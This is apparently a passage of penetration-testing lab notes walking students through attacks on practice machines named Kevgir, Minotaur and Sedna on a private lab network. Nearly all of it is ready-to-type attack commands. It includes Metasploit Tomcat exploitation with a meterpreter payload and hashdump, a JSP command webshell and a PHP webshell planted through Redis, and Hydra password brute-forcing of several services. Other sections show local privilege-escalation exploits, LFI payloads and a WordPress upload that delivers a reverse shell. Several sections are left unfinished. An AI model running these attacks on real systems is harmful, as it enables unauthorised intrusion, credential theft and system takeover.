  1037. 25/tcp open ftp vsftpd 3.0.2
  1038. 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
  1039. 111/tcp open rpcbind 2-4 (RPC #100000)
  1040. 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: CANYOUPWNME)
  1041. 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: CANYOUPWNME)
  1042. 1322/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
  1043. 2049/tcp open nfs_acl 2-3 (RPC #100227)
  1044. 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
  1045. 8081/tcp open http Apache httpd 2.4.7 ((Ubuntu))
  1046. 9000/tcp open http Jetty winstone-2.9
  1047. Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
  1048.  
  1049. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1050. Nmap done: 1 IP address (1 host up) scanned in 15.15 seconds
  1051.  
  1052.  
  1053.  
  1054.  
  1055.  
  1056.  
  1057.  
  1058.  
  1059. ###########################
  1060. # Day 1: Attacking Kevgir #
  1061. ###########################
  1062.  
  1063.  
  1064. ******** Attacking Kevgir ********
  1065. I figured I've give you something fun to play with.
  1066.  
  1067.  
  1068.  
  1069. ###############
  1070. # Using Nikto #
  1071. ###############
  1072.  
  1073. ---------------------------Type This-----------------------------------
  1074.  
  1075. cd ~/toolz/
  1076.  
  1077. rm -rf nikto*
  1078.  
  1079. git clone https://github.com/sullo/nikto.git Nikto2
  1080.  
  1081. cd Nikto2/program
  1082.  
  1083. perl nikto.pl -h 172.31.2.24
  1084.  
  1085. perl nikto.pl -h 172.31.2.24:8080
  1086.  
  1087. perl nikto.pl -h 172.31.2.24:8081
  1088.  
  1089. perl nikto.pl -h 172.31.2.24:9000
  1090.  
  1091. -----------------------------------------------------------------------
  1092.  
  1093.  
  1094.  
  1095. ####################
  1096. # Using Metasploit #
  1097. ####################
  1098.  
  1099. ---------------------------Type This-----------------------------------
  1100.  
  1101. cd ~/toolz/metasploit
  1102.  
  1103. ./msfconsole
  1104.  
  1105. use auxiliary/scanner/http/http_version
  1106.  
  1107. set RHOSTS 172.31.2.24
  1108.  
  1109. set RPORT 8080
  1110.  
  1111. run
  1112.  
  1113.  
  1114. -------------------------------
  1115.  
  1116. use auxiliary/scanner/http/tomcat_enum
  1117.  
  1118. set RHOSTS 172.31.2.24
  1119.  
  1120. set RPORT 8080
  1121.  
  1122. run
  1123. -----------------------------------------------------------------------
  1124.  
  1125.  
  1126.  
  1127.  
  1128.  
  1129. ####################
  1130. # Attacking Tomcat #
  1131. ####################
  1132.  
  1133. ---------------------------Type This-----------------------------------
  1134.  
  1135. use auxiliary/scanner/http/http_version
  1136.  
  1137. set RHOSTS 172.31.2.24
  1138.  
  1139. set RPORT 8080
  1140.  
  1141. run
  1142.  
  1143.  
  1144. -------------------------------
  1145.  
  1146.  
  1147. use auxiliary/scanner/http/tomcat_mgr_login
  1148.  
  1149. set USERNAME tomcat
  1150.  
  1151. set USERPASS_FILE /home/infosecaddicts/list.txt
  1152.  
  1153. set STOP_ON_SUCCESS true
  1154.  
  1155. set RHOSTS 172.31.2.24
  1156.  
  1157. set RPORT 8080
  1158.  
  1159. run
  1160.  
  1161.  
  1162. -------------------------------
  1163.  
  1164. use exploit/multi/http/tomcat_mgr_upload
  1165.  
  1166. set HttpUsername tomcat
  1167.  
  1168. set HttpPassword tomcat
  1169.  
  1170. set RHOST 172.31.2.24
  1171.  
  1172. set RPORT 8080
  1173.  
  1174. set PATH /manager/html
  1175.  
  1176. set PAYLOAD java/meterpreter/bind_tcp
  1177.  
  1178. exploit
  1179.  
  1180.  
  1181. run post/linux/gather/checkvm
  1182.  
  1183. run post/linux/gather/enum_configs
  1184.  
  1185. run post/linux/gather/enum_protections
  1186.  
  1187. run post/linux/gather/enum_system
  1188.  
  1189. run post/linux/gather/enum_users_history
  1190.  
  1191. run post/linux/gather/hashdump
  1192.  
  1193. shell
  1194.  
  1195. /bin/bash
  1196.  
  1197. id
  1198.  
  1199. uname -a
  1200.  
  1201. dpkg -l
  1202.  
  1203. cd /tmp
  1204.  
  1205. pwd
  1206.  
  1207.  
  1208. cat >> exploit.c << out
  1209.  
  1210. **************paste in the content from here *****************
  1211. https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/39166.c
  1212.  
  1213.  
  1214. ------ hit enter a few times ------
  1215.  
  1216. ------ then type 'out' ----- this closes the file handle...
  1217.  
  1218.  
  1219. gcc -o boom exploit.c
  1220.  
  1221. ./boom
  1222.  
  1223. id
  1224.  
  1225.  
  1226. -----------------------------------------------------------------------
  1227.  
  1228. ---------------------------Type This-----------------------------------
  1229.  
  1230. hydra -l tomcat -P /home/infosecaddicts/list.txt -e ns -s 8080 -vV 172.31.2.24 http-get /manager/html
  1231. -----------------------------------------------------------------------
  1232.  
  1233.  
  1234.  
  1235.  
  1236.  
  1237. -------------------------------------------index.jsp-------------------------------------------
  1238. <FORM METHOD=GET ACTION='index.jsp'>
  1239. <INPUT name='cmd' type=text>
  1240. <INPUT type=submit value='Run'>
  1241. </FORM>
  1242. <%@ page import="java.io.*" %>
  1243. <%
  1244. String cmd = request.getParameter("cmd");
  1245. String output = "";
  1246. if(cmd != null) {
  1247. String s = null;
  1248. try {
  1249. Process p = Runtime.getRuntime().exec(cmd,null,null);
  1250. BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
  1251. while((s = sI.readLine()) != null) { output += s+"</br>"; }
  1252. } catch(IOException e) { e.printStackTrace(); }
  1253. }
  1254. %>
  1255. <pre><%=output %></pre>
  1256. -------------------------------------------index.jsp-------------------------------------------
  1257.  
  1258. ***** now pack the webshell *****
  1259.  
  1260.  
  1261. ---------------------------Type This-----------------------------------
  1262.  
  1263. mkdir webshell
  1264. cp index.jsp webshell
  1265.  
  1266. cd webshell
  1267. jar -cvf ../webshell.war *
  1268. -----------------------------------------------------------------------
  1269.  
  1270.  
  1271. Deploy the WAR file using the built-in deploy option on the manager web-page.
  1272. Once the WAR file is deployed I simply browse to the URL I deployed the WAR file
  1273. now upload the webshell.war. After uploading, visit page: http://172.31.2.2:8080/webshell/
  1274.  
  1275.  
  1276.  
  1277. ****** This section isn't finished ******
  1278.  
  1279. ---------------------------Type This-----------------------------------
  1280.  
  1281. cd ~/toolz/metasploit
  1282.  
  1283. ./msfvenom -p linux/x86/shell_bind_tcp LPORT="7777" -f war > /home/infosecaddicts/bind7777.war
  1284.  
  1285. jar tf ~/bind7777.war
  1286. -----------------------------------------------------------------------
  1287.  
  1288. ****** This section isn't finished ******
  1289.  
  1290. Google is your friend hahahahahahahah........
  1291.  
  1292.  
  1293. #################
  1294. # Attacking FTP #
  1295. #################
  1296.  
  1297. ---------------------------Type This-----------------------------------
  1298.  
  1299. sudo nmap -sV -Pn -p25 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 172.31.2.24
  1300.  
  1301. cd ~/toolz/hydra
  1302.  
  1303. hydra -l admin -P /home/infosecaddicts/list.txt -u -s 25 172.31.2.24 ftp
  1304.  
  1305. ftp
  1306. open 172.31.2.24
  1307. admin
  1308. admin
  1309. pwd
  1310. ls -lah
  1311.  
  1312. ls ../../
  1313. -----------------------------------------------------------------------
  1314.  
  1315.  
  1316. #################
  1317. # Attacking SSH #
  1318. #################
  1319.  
  1320. ---------------------------Type This-----------------------------------
  1321.  
  1322. sudo apt-get install -y libssh-dev
  1323. infosecaddicts
  1324. cd ~/toolz/hydra
  1325. make clean
  1326. ./configure
  1327. make
  1328. sudo make install
  1329.  
  1330.  
  1331. hydra -L /home/infosecaddicts/list.txt -P /home/infosecaddicts/list.txt -u -s 1322 172.31.2.24 ssh
  1332.  
  1333. ssh -p 1322 admin@172.31.2.24
  1334.  
  1335.  
  1336. -------------------------------
  1337.  
  1338. cd ~/toolz/metasploit
  1339.  
  1340. ./msfconsole
  1341.  
  1342. use auxiliary/scanner/ssh/ssh_enumusers
  1343.  
  1344. set USER_FILE /home/infosecaddicts/list.txt
  1345.  
  1346. set STOP_ON_SUCCESS true
  1347.  
  1348. set RHOSTS 172.31.2.24
  1349.  
  1350. set RPORT 1322
  1351.  
  1352. run
  1353.  
  1354.  
  1355.  
  1356.  
  1357.  
  1358. use auxiliary/scanner/ssh/ssh_login
  1359.  
  1360. set USER_FILE /home/infosecaddicts/list.txt
  1361.  
  1362. set PASS_FILE /home/infosecaddicts/list.txt
  1363.  
  1364. set STOP_ON_SUCCESS true
  1365.  
  1366. set RHOSTS 172.31.2.24
  1367.  
  1368. set RPORT 1322
  1369.  
  1370. run
  1371.  
  1372.  
  1373. sessions -l
  1374.  
  1375. sessions -u 1
  1376.  
  1377. sessions -i 1
  1378.  
  1379. id
  1380.  
  1381. -----------------------------------------------------------------------
  1382.  
  1383.  
  1384. ########################
  1385. # Attacking phpMyAdmin #
  1386. ########################
  1387. ****** This section isn't finished ******
  1388.  
  1389. ---------------------------Type This-----------------------------------
  1390.  
  1391. hydra -l root -P /home/infosecaddicts/list.txt -e n http-post-form://172.31.2.24 -m "/phpMyAdmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1:S=information_schema"
  1392. -----------------------------------------------------------------------
  1393.  
  1394. ****** This section isn't finished ******
  1395.  
  1396. Google is your friend hahahahahahahah........
  1397.  
  1398.  
  1399.  
  1400. ---------------------------Type This-----------------------------------
  1401.  
  1402. wget https://repo.palkeo.com/repositories/mysterie.fr/prog/darkc0de/others/pmabf.py
  1403.  
  1404. python pmabf.py http://172.31.2.24 root list.txt (this gave me the WRONG password)
  1405. -----------------------------------------------------------------------
  1406.  
  1407.  
  1408.  
  1409.  
  1410.  
  1411.  
  1412. ####################
  1413. # Attacking Joomla #
  1414. ####################
  1415.  
  1416. ---------------------------Type This-----------------------------------
  1417.  
  1418. cd ~/toolz/metasploit
  1419.  
  1420. ./msfconsole
  1421.  
  1422. use use auxiliary/scanner/http/joomla_plugins
  1423.  
  1424. set RHOSTS 172.31.2.24
  1425.  
  1426. set RPORT 8080
  1427.  
  1428. run
  1429. -----------------------------------------------------------------------
  1430.  
  1431.  
  1432. ****** This section isn't finished ******
  1433. Google is your friend hahahahahahahah........
  1434.  
  1435. #####################
  1436. # Attacking Jenkins #
  1437. #####################
  1438.  
  1439.  
  1440. ****** This section isn't finished ******
  1441. Google is your friend hahahahahahahah........
  1442.  
  1443. #################
  1444. # Attacking NFS #
  1445. #################
  1446.  
  1447. ---------------------------Type This-----------------------------------
  1448.  
  1449. sudo apt install -y rpcbind nfs-common
  1450.  
  1451. rpcinfo -s 172.31.2.24
  1452.  
  1453. showmount -e 172.31.2.24
  1454.  
  1455. sudo /bin/bash
  1456.  
  1457. mkdir /tmp/nfs
  1458.  
  1459. mount -t nfs 172.31.2.24:/backup /tmp/nfs -o nolock
  1460.  
  1461. ls /tmp/nfs
  1462.  
  1463. cp /tmp/nfs/backup.tar.bz2.zip /home/infosecaddicts
  1464.  
  1465. umount -l /tmp/nfs
  1466.  
  1467. exit
  1468.  
  1469. sudo apt-cache search fcrackzip
  1470.  
  1471. sudo apt-get install -y fcrackzip
  1472.  
  1473. fcrackzip -u backup.tar.bz2.zip
  1474.  
  1475. unzip -P aaaaaa backup.tar.bz2.zip
  1476.  
  1477. tar jxf backup.tar.bz2
  1478. -----------------------------------------------------------------------
  1479.  
  1480.  
  1481. ###################
  1482. # Attacking Redis #
  1483. ###################
  1484.  
  1485. ---------------------------Type This-----------------------------------
  1486.  
  1487. sudo nmap -p 6379 --script=redis-info 172.31.2.24
  1488. infosecaddicts
  1489.  
  1490. sudo apt-get install -y redis-tools
  1491. infosecaddicts
  1492.  
  1493. redis-cli -h 172.31.2.24
  1494.  
  1495. CONFIG SET dir /var/www/html/main
  1496.  
  1497. CONFIG GET dir
  1498.  
  1499. config set dbfilename boom.php
  1500.  
  1501. CONFIG GET dbfilename
  1502.  
  1503. SET cmd "<?php system($_GET['joe']); ?>"
  1504.  
  1505. BGSAVE
  1506.  
  1507. http://172.31.2.24/boom.php
  1508.  
  1509. http://172.31.2.24/boom.php?joe=id
  1510.  
  1511.  
  1512. (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt/.ssh"
  1513.  
  1514.  
  1515.  
  1516. ****** This section isn't finished ******
  1517. Google is your friend hahahahahahahah........
  1518.  
  1519. cd ~/toolz/metasploit
  1520.  
  1521. ./msfconsole
  1522.  
  1523. use auxiliary/scanner/redis/file_upload
  1524.  
  1525. set RHOSTS 172.31.2.24
  1526.  
  1527. set LocalFile
  1528.  
  1529. ****** This section isn't finished ******
  1530. Google is your friend hahahahahahahah........
  1531.  
  1532.  
  1533.  
  1534.  
  1535.  
  1536. sudo nmap -sV -p 3260 172.31.2.217
  1537.  
  1538.  
  1539. sudo apt install open-iscsi
  1540.  
  1541. sudo iscsiadm -m discovery -t st -p 172.31.2.217
  1542.  
  1543. sudo iscsiadm -m discovery -t st -p 172.31.2.217:3260
  1544.  
  1545. sudo iscsiadm -m node -p 172.31.2.217 --login
  1546.  
  1547. sudo /bin/bash
  1548.  
  1549. fdisk -l
  1550. ***** look for /dev/sda5 - Linux swap / Solaris *******
  1551.  
  1552. mkdir /mnt/217vm
  1553.  
  1554. mount /dev/sdb /mnt/217vm
  1555.  
  1556. cd /mnt/217vm
  1557.  
  1558. ls
  1559.  
  1560. cat flag1.txt
  1561.  
  1562. file bobsdisk.dsk
  1563.  
  1564. mkdir /media/bobsdisk
  1565.  
  1566. mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
  1567.  
  1568. /mnt/217vm# ls
  1569.  
  1570. cd /media/bobsdisk/
  1571.  
  1572. ls
  1573.  
  1574. cat ToAlice.eml
  1575.  
  1576. file bobsdisk.dsk
  1577.  
  1578. mkdir /media/bobsdisk
  1579.  
  1580. mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
  1581.  
  1582. /mnt/217vm# ls
  1583.  
  1584. cd /media/bobsdisk/
  1585.  
  1586. ls
  1587.  
  1588. cat ToAlice.eml
  1589.  
  1590. file ToAlice.csv.enc
  1591.  
  1592. file bobsdisk.dsk
  1593.  
  1594. pwd
  1595.  
  1596. mkdir /media/bobsdisk
  1597.  
  1598.  
  1599. mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
  1600.  
  1601. ls
  1602.  
  1603. cd /media/bobsdisk/
  1604.  
  1605. ls
  1606.  
  1607. openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
  1608.  
  1609. ls
  1610.  
  1611. cat ToAlice.eml | grep flag
  1612.  
  1613. openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
  1614.  
  1615. ls
  1616.  
  1617. cat ToAlice.eml
  1618. ***** look for supercalifragilisticoespialidoso ******
  1619.  
  1620. openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
  1621.  
  1622. supercalifragilisticoespialidoso
  1623.  
  1624.  
  1625. ls
  1626.  
  1627. cat ToAlice.csv
  1628. -----------------------------------------------------------------------
  1629.  
  1630. -----------------------------------------------------
  1631. Web Path,Reason
  1632. 5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site!
  1633. c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
  1634. flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?
  1635.  
  1636. -----------------------------------------------------
  1637.  
  1638. The hints are "Web Path" and "strangest URL" so let's try the long strings in the URL:
  1639. http://172.31.2.217/5560a1468022758dba5e92ac8f2353c0/
  1640. -- view source
  1641.  
  1642. Found this string in the source:
  1643. R2VvcmdlIENvc3RhbnphOiBbU291cCBOYXppIGdpdmVzIGhpbSBhIGxvb2tdIE1lZGl1bSB0dXJr
  1644. ZXkgY2hpbGkuIApbaW5zdGFudGx5IG1vdmVzIHRvIHRoZSBjYXNoaWVyXSAKSmVycnkgU2VpbmZl
  1645. bGQ6IE1lZGl1bSBjcmFiIGJpc3F1ZS4gCkdlb3JnZSBDb3N0YW56YTogW2xvb2tzIGluIGhpcyBi
  1646. YWcgYW5kIG5vdGljZXMgbm8gYnJlYWQgaW4gaXRdIEkgZGlkbid0IGdldCBhbnkgYnJlYWQuIApK
  1647. ZXJyeSBTZWluZmVsZDogSnVzdCBmb3JnZXQgaXQuIExldCBpdCBnby4gCkdlb3JnZSBDb3N0YW56
  1648. YTogVW0sIGV4Y3VzZSBtZSwgSSAtIEkgdGhpbmsgeW91IGZvcmdvdCBteSBicmVhZC4gClNvdXAg
  1649. TmF6aTogQnJlYWQsICQyIGV4dHJhLiAKR2VvcmdlIENvc3RhbnphOiAkMj8gQnV0IGV2ZXJ5b25l
  1650. IGluIGZyb250IG9mIG1lIGdvdCBmcmVlIGJyZWFkLiAKU291cCBOYXppOiBZb3Ugd2FudCBicmVh
  1651. ZD8gCkdlb3JnZSBDb3N0YW56YTogWWVzLCBwbGVhc2UuIApTb3VwIE5hemk6ICQzISAKR2Vvcmdl
  1652. IENvc3RhbnphOiBXaGF0PyAKU291cCBOYXppOiBOTyBGTEFHIEZPUiBZT1UK
  1653.  
  1654. ------ https://www.base64decode.org/ -------
  1655. ------ Decoded, but didn't find a flag -----
  1656.  
  1657.  
  1658. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/
  1659. -- view source --
  1660. -- Nothing in source --
  1661.  
  1662. Browsed to the flag link:
  1663. view-source:http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=flag
  1664. -- view source --
  1665. -- Nothing in source --
  1666.  
  1667.  
  1668. Tried a PHP base64 decode with the URL:
  1669. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=welcome.php
  1670. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
  1671. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=party.php
  1672.  
  1673. ------ https://www.base64decode.org/ -------
  1674. Use the string found here:
  1675. http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
  1676.  
  1677. -------------------------------------------------------------------
  1678. PD9waHAKZGVmaW5lZCAoJ1ZJQUlOREVYJykgb3IgZGllKCdPb29vaCEgU28gY2xvc2UuLicpOwo/Pgo8aDE+RmxhZzwvaDE+CjxwPkhtbS4gTG9va2luZyBmb3IgYSBmbGFnPyBDb21lIG9uLi4uIEkgaGF2ZW4ndCBtYWRlIGl0IGVhc3kgeWV0LCBkaWQgeW91IHRoaW5rIEkgd2FzIGdvaW5nIHRvIHRoaXMgdGltZT88L3A+CjxpbWcgc3JjPSJ0cm9sbGZhY2UucG5nIiAvPgo8P3BocAovLyBPaywgb2suIEhlcmUncyB5b3VyIGZsYWchIAovLwovLyBmbGFnNHs0ZTQ0ZGIwZjFlZGMzYzM2MWRiZjU0ZWFmNGRmNDAzNTJkYjkxZjhifQovLyAKLy8gV2VsbCBkb25lLCB5b3UncmUgZG9pbmcgZ3JlYXQgc28gZmFyIQovLyBOZXh0IHN0ZXAuIFNIRUxMIQovLwovLyAKLy8gT2guIFRoYXQgZmxhZyBhYm92ZT8gWW91J3JlIGdvbm5hIG5lZWQgaXQuLi4gCj8+Cg==
  1679. -------------------------------------------------------------------
  1680. <?php
  1681. defined ('VIAINDEX') or die('Ooooh! So close..');
  1682. ?>
  1683. <h1>Flag</h1>
  1684. <p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>
  1685. <img src="trollface.png" />
  1686. <?php
  1687. // Ok, ok. Here's your flag!
  1688. //
  1689. // flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
  1690. //
  1691. // Well done, you're doing great so far!
  1692. // Next step. SHELL!
  1693. //
  1694. //
  1695. // Oh. That flag above? You're gonna need it...
  1696. ?>
  1697.  
  1698. ######################
  1699. # Attacking Minotaur #
  1700. ######################
  1701.  
  1702. Step 1: Portscan/Bannergrab the target host
  1703. ---------------------------Type This-----------------------------------
  1704. sudo nmap -sV 172.31.2.117
  1705. -----------------------------------------------------------------------
  1706.  
  1707.  
  1708.  
  1709. Step 2: Vulnerability scan the web server
  1710. ---------------------------Type This-----------------------------------
  1711. cd ~/toolz/
  1712.  
  1713. rm -rf nikto*
  1714.  
  1715. git clone https://github.com/sullo/nikto.git Nikto2
  1716.  
  1717. cd ~/toolz/Nikto2/program
  1718.  
  1719. perl nikto.pl -h 172.31.2.117
  1720. -----------------------------------------------------------------------
  1721.  
  1722.  
  1723.  
  1724. Step 3: Directory brute-force the webserver
  1725. ---------------------------Type This-----------------------------------
  1726. cd ~/toolz
  1727.  
  1728. git clone https://github.com/v0re/dirb.git
  1729.  
  1730. cd dirb/
  1731.  
  1732. ./configure
  1733.  
  1734. make
  1735.  
  1736. dirb
  1737.  
  1738. ./dirb http://172.31.2.117 wordlists/big.txt
  1739. -----------------------------------------------------------------------
  1740.  
  1741. ### dirb output ###
  1742. ==> DIRECTORY: http://172.31.2.117/bull/
  1743. -----------------------------------------------------------------------
  1744.  
  1745.  
  1746. Step 4: Run wordpress vulnerability scanner
  1747. ---------------------------Type This-----------------------------------
  1748. sudo apt-get install -y libcurl4-openssl-dev libxml2 libxml2-dev libxslt1-dev ruby-dev build-essential libgmp-dev zlib1g-dev
  1749.  
  1750. cd ~/toolz
  1751.  
  1752. rm -rf wpsca*
  1753.  
  1754. git clone https://github.com/wpscanteam/wpscan.git
  1755.  
  1756. cd wpscan
  1757.  
  1758. sudo gem install bundler && bundle install --without test development
  1759.  
  1760. rbenv install 2.5.0-dev
  1761.  
  1762. ruby wpscan.rb -u http://172.31.2.117/bull/ --enumerate u
  1763. -----------------------------------------------------------------------
  1764.  
  1765.  
  1766.  
  1767.  
  1768. Step 5: Attack vulnerable Wordpress plugin with Metasploit
  1769. ---------------------------Type This-----------------------------------
  1770. cd ~/toolz/metasploit
  1771.  
  1772. ./msfconsole
  1773.  
  1774. use exploit/unix/webapp/wp_slideshowgallery_upload
  1775.  
  1776. set RHOST 172.31.2.117
  1777.  
  1778. set RPORT 80
  1779.  
  1780. set TARGETURI /bull
  1781.  
  1782. set WP_USER bully
  1783.  
  1784. set WP_PASSWORD Bighornedbulls
  1785.  
  1786. exploit
  1787. -----------------------------------------------------------------------
  1788.  
  1789. Damn...that didn't work...Can't reverse shell from inside the network to a host in the VPN network range.
  1790. This is a lab limitation that I implemented to stop students from compromising hosts in the lab network
  1791. and then from the lab network attacking other students.
  1792.  
  1793.  
  1794. ---------------------------Type This-----------------------------------
  1795. wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
  1796.  
  1797. tar -zxvf php-reverse-shell-1.0.tar.gz
  1798.  
  1799. cd ~/toolz/php-reverse-shell-1.0/
  1800.  
  1801. nano php-reverse-shell.php
  1802. -----------------------------------------------------------------------
  1803. ***** change the $ip and $port variables to a host that you have already compromised in the network
  1804. ***** for this example I chose 172.31.2.64 and kept port 1234
  1805.  
  1806.  
  1807. ---------------------------Type This-----------------------------------
  1808. chmod 777 php-reverse-shell.php
  1809. cp php-reverse-shell.php ..
  1810. -----------------------------------------------------------------------
  1811.  
  1812.  
  1813.  
  1814. ----------- Paste this into a new file called wp_gallery_slideshow_146_suv.py -----------
  1815. https://www.exploit-db.com/raw/34681/
  1816.  
  1817. python wp_gallery_slideshow_146_suv.py -t http://172.31.2.117/bull/ -u bully -p Bighornedbulls -f php-reverse-shell.php
  1818.  
  1819. -----------------------------------------------------------------------
  1820.  
  1821.  
  1822.  
  1823. Set up netcat listener on previously compromised host
  1824. ---------------------------Type This-----------------------------------
  1825. ssh -l webmin 172.31.2.64
  1826. webmin1980
  1827.  
  1828. python -c 'import pty;pty.spawn("/bin/bash")'
  1829.  
  1830.  
  1831. cd /tmp
  1832.  
  1833. ./boom2
  1834.  
  1835. nc -lvp 1234
  1836. -----------------------------------------------------------------------
  1837.  
  1838.  
  1839.  
  1840.  
  1841. ---------------------Type This in your browser ------------------------
  1842. http://172.31.2.117/bull//wp-content/uploads/slideshow-gallery/php-reverse-shell.php
  1843. -----------------------------------------------------------------------
  1844.  
  1845.  
  1846. Now check your listener to see if you got the connection
  1847. ---------------------------Type This-----------------------------------
  1848. id
  1849.  
  1850. /sbin/ifconfig
  1851.  
  1852. python -c 'import pty;pty.spawn("/bin/bash")'
  1853.  
  1854. ---------------------------Type This-----------------------------------
  1855. cd /tmp
  1856. cat >> exploit2.c << out
  1857. -----------------------------------------------------------------------
  1858. **************paste in the content from here *****************
  1859. https://www.exploit-db.com/raw/37292/
  1860.  
  1861. **************hit enter a few times *****************
  1862.  
  1863. ---------------------------Type This-----------------------------------
  1864. out
  1865.  
  1866.  
  1867. gcc -o boom2 exploit2.c
  1868.  
  1869. ./boom2
  1870.  
  1871. id
  1872. -----------------------------------------------------------------------
  1873.  
  1874. ......YEAH - do the happy dance!!!!
  1875.  
  1876.  
  1877.  
  1878.  
  1879.  
  1880. ##################
  1881. # Attacking Sedna #
  1882. ###################
  1883.  
  1884. Attack steps:
  1885. -------------
  1886.  
  1887.  
  1888.  
  1889. Step 1: Ping sweep the target network
  1890. ---------------------------Type This-----------------------------------
  1891. nmap -sP 172.31.2.0/24
  1892. -----------------------------------------------------------------------
  1893.  
  1894.  
  1895.  
  1896.  
  1897.  
  1898.  
  1899. Step 2: Port scan/Bannergrab the target host
  1900. ---------------------------Type This-----------------------------------
  1901. sudo nmap -sV 172.31.2.86
  1902. -----------------------------------------------------------------------
  1903.  
  1904.  
  1905. PORT STATE SERVICE VERSION
  1906. 22/tcp open ssh (protocol 2.0)
  1907. 53/tcp open domain ISC BIND 9.9.5-3-Ubuntu
  1908. 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
  1909. 110/tcp open pop3 Dovecot pop3d
  1910. 111/tcp open rpcbind 2-4 (RPC #100000)
  1911. 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: SEDNA)
  1912. 143/tcp open imap Dovecot imapd
  1913. 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: SEDNA)
  1914. 514/tcp filtered shell
  1915. 993/tcp open ssl/imap Dovecot imapd
  1916. 995/tcp open ssl/pop3 Dovecot pop3d
  1917. 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
  1918. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
  1919. SF-Port22-TCP:V=6.40%I=7%D=1/26%Time=5A6B4540%P=x86_64-pc-linux-gnu%r(NULL
  1920. SF:,29,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n");
  1921.  
  1922. Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
  1923. Nmap done: 1 IP address (1 host up) scanned in 246.11 seconds
  1924.  
  1925.  
  1926.  
  1927.  
  1928.  
  1929.  
  1930.  
  1931.  
  1932.  
  1933. Step 3: Vulnerability scan the webserver ports
  1934. ---------------------------Type This-----------------------------------
  1935. cd ~/toolz/
  1936.  
  1937. rm -rf nikto*
  1938.  
  1939. git clone https://github.com/sullo/nikto.git Nikto2
  1940.  
  1941. cd Nikto2/program
  1942.  
  1943. perl nikto.pl -h 172.31.2.86
  1944.  
  1945. perl nikto.pl -h 172.31.2.86:8080
  1946. -----------------------------------------------------------------------
  1947.  
  1948.  
  1949.  
  1950.  
  1951.  
  1952. Step 4: Perform directory bruteforce against the target host
  1953. ---------------------------Type This-----------------------------------
  1954. wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
  1955.  
  1956. perl Webr00t.pl -h 172.31.2.86 -v
  1957. -----------------------------------------------------------------------
  1958.  
  1959.  
  1960.  
  1961. or with dirbuster (dirb)
  1962.  
  1963.  
  1964.  
  1965.  
  1966. ---------------------------Type This-----------------------------------
  1967. cd ~/toolz
  1968.  
  1969. git clone https://github.com/v0re/dirb.git
  1970.  
  1971. cd dirb/
  1972.  
  1973. ./configure
  1974.  
  1975. make
  1976.  
  1977. dirb
  1978.  
  1979. ./dirb http://172.31.2.86 wordlists/big.txt
  1980. -----------------------------------------------------------------------
  1981.  
  1982. ### dirb output ###
  1983. ==> DIRECTORY: http://172.31.2.86/blocks/
  1984. ==> DIRECTORY: http://172.31.2.86/files/
  1985. ==> DIRECTORY: http://172.31.2.86/modules/
  1986. ==> DIRECTORY: http://172.31.2.86/system/
  1987. ==> DIRECTORY: http://172.31.2.86/themes/
  1988.  
  1989. + http://172.31.2.86/robots.txt (CODE:200|SIZE:36)
  1990. + http://172.31.2.86/server-status (CODE:403|SIZE:291)
  1991. ### dirb output ###
  1992.  
  1993.  
  1994.  
  1995.  
  1996.  
  1997. Browsed each of the directories and found that inside of the /themes folder contained the vulnerable application Builder Engine 3.5.0
  1998.  
  1999. An exploit for this application can be found at:
  2000. https://www.exploit-db.com/exploits/40390/
  2001.  
  2002.  
  2003.  
  2004.  
  2005.  
  2006. -------------------save this a "BuilderEngine.html"-------------------
  2007. <html>
  2008. <body>
  2009. <form method="post" action="http://172.31.2.86/themes/dashboard/assets/plugins/jquery-file-upload/server/php/"
  2010.  
  2011. enctype="multipart/form-data">
  2012. <input type="file" name="files[]" />
  2013. <input type="submit" value="send" />
  2014. </form>
  2015. </body>
  2016. </html>
  2017. -----------------------------------------------------------------------
  2018.  
  2019.  
  2020. Download this webshell (http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz) to your local machine.
  2021.  
